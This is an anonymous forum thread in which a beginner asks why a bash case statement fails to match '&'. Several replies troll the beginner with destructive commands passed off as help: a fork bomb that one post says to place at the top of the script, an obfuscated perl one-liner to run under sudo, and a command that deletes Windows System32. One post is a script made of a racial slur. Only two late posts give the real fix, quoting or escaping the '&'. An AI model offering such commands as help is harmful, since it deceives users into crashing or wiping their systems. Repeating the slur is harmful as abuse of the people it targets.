Bash?!?!
1
Name:
Anonymous
2011-11-06 1:23
#! /bin/bash
num="&"
case "$num" in
& )
echo "This works"
;;
esac
why doesn't this work?
2
Name:
Anonymous
2011-11-06 1:32
Try this.
:(){:|:}:
3
Name:
Anonymous
2011-11-06 1:36
i dont get it?
4
Name:
Anonymous
2011-11-06 1:36
This rather.
:(){:|:&};:
ENTERPRISE QUALITY BASH SCRIPTING FOR THE NEXT SOCIAL REVOLUTION. ARE YOU READY FOR WHAT'S NEXT?
5
Name:
Anonymous
2011-11-06 1:39
sorry im new at this ?
case "$num" in
:(){:|:&};:
echo "doesn't work"
????
6
Name:
Anonymous
2011-11-06 1:41
It goes near the top, like so.
#! /bin/bash
:(){ :|:& };:
num="&"
case "$num" in
& )
echo "This works"
;;
esac
7
Name:
Anonymous
2011-11-06 1:42
Thanks !!!
8
Name:
Anonymous
2011-11-06 1:43
thats not nice
9
Name:
Anonymous
2011-11-06 1:48
well that was fun can you help me now ?
10
Name:
Anonymous
2011-11-06 1:49
am i baned?
11
Name:
Anonymous
2011-11-06 1:56
o you have to make it literal \& you guys suck
12
Name:
Anonymous
2011-11-06 2:14
>>10
If there is then yes you should be IP banned for life.
13
Name:
Anonymous
2011-11-06 2:56
>>8
<img src="coolface.jpg" />
14
Name:
Anonymous
2011-11-06 3:12
OP, try running
sudo perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
post results here, so we will know what your OS is.
15
Name:
Anonymous
2011-11-06 3:46
OP, try running
C:\>DELTREE C:\WINDOWS\SYSTEM32
16
Name:
Anonymous
2011-11-06 4:13
#!/nigger/nigger/nigger
nigger="nigger"
nigger "$nigger" nigger
"nigger")
nigger "nigger"
;;
nigger
YOU CAN THANK ME LATER
17
Name:
Anonymous
2011-11-06 7:50
>>8
http://en.wikipedia.org/wiki/Fork_bomb
http://linux.die.net/man/5/limits.conf
>>1
http://tldp.org/LDP/abs/html/index.html
>>11
Methinks quoting would be more reliable.
& - reserved name. Don't use it if you don't mean it.
\& - works
'&',
"&" - better. Kinda removes any doubt that it's a text string.
18
Name:
Anonymous
2011-11-06 13:44
19
Name:
Anonymous
2011-11-06 16:37
>>18
I could have said "no u", but I'm out of trollfeed.